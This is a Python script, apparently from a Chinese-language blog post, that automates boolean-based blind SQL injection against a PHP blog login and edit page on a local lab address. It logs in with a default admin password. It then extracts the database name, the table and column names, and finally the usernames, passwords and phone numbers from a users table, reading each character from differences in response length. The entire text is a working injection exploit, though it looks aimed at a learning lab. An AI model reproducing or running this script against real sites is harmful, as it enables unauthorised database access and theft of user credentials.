# -*- coding: utf-8 -*- # @Time : 2022/6/16 17:12 # @Author : admin # @Email : 1985264689@qq.com # @File : blindtk.py # @Project : 项目 # @脚本说明 : from collections import Counter import requests #保持session会话状态 url = 'http://192.168.0.0/learn/blog/login-1.php' data = {'username':'admin','password':'123456','vcode':'0000'} session = requests.session() resp = session.post(url=url,data=data) #取数据库名称长度 count = [] for l in range(1,10): url1 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and length(database())={l}' data_len = session.get(url=url1) lens = len(data_len.text) #用Counter去计算列表内出现最多的值 count.append(lens) num = Counter(count) res = num.most_common() max = res[0][0] if lens > max: print(l) #取数据库名称 sum = 'abcdefghijklmnopqrstuvwxyz0123456789,_:' dataname = '' count = [] for k in range(1,16): for i in sum: url2 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and substr(database(),{k},1)="{i}"' data_name = session.get(url=url2) lens = len(data_name.text) count.append(lens) num = Counter(count) res = num.most_common() max = res[0][0] if lens > max: dataname += i break print(dataname) #取数据库表名 table_list = '' count = [] for h in range(0, 15): for i in sum: url3 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and ' \ f'substr((select group_concat(table_name) from information_schema.tables where table_schema="{dataname}"),{h},1)="{i}"' table_name = session.get(url=url3) lens = len(table_name.text) count.append(lens) num = Counter(count) res = num.most_common() max = res[0][0] if lens > max: table_list += i break print(table_list) #取表中的列名 tablenames = table_list.strip().split(',') count = [] for tablename in tablenames: column_list = '' for h in range(100): for i in sum: url4 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and ' \ f'substr((select group_concat(column_name) from information_schema.columns where table_schema="{dataname}" and table_name="{tablename}" ),{h},1)="{i}"' column_name = session.get(url=url4) lens = len(column_name.text) count.append(lens) num = Counter(count) res = num.most_common() max = res[0][0] if lens > max: column_list += i break print(column_list) # 取users表中的核心列名值 center_value = '' count = [] for m in range(200): for i in sum: url5 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and substr((select group_concat(concat_ws(":",username,password,phone)) from users),"{m}",1)="{i}"' value = session.get(url=url5) lens = len(value.text) count.append(lens) num = Counter(count) res = num.most_common() max = res[0][0] if lens > max: center_value += i break print(center_value)
Python SQL布尔型盲注
于 2022-07-03 17:28:43 首次发布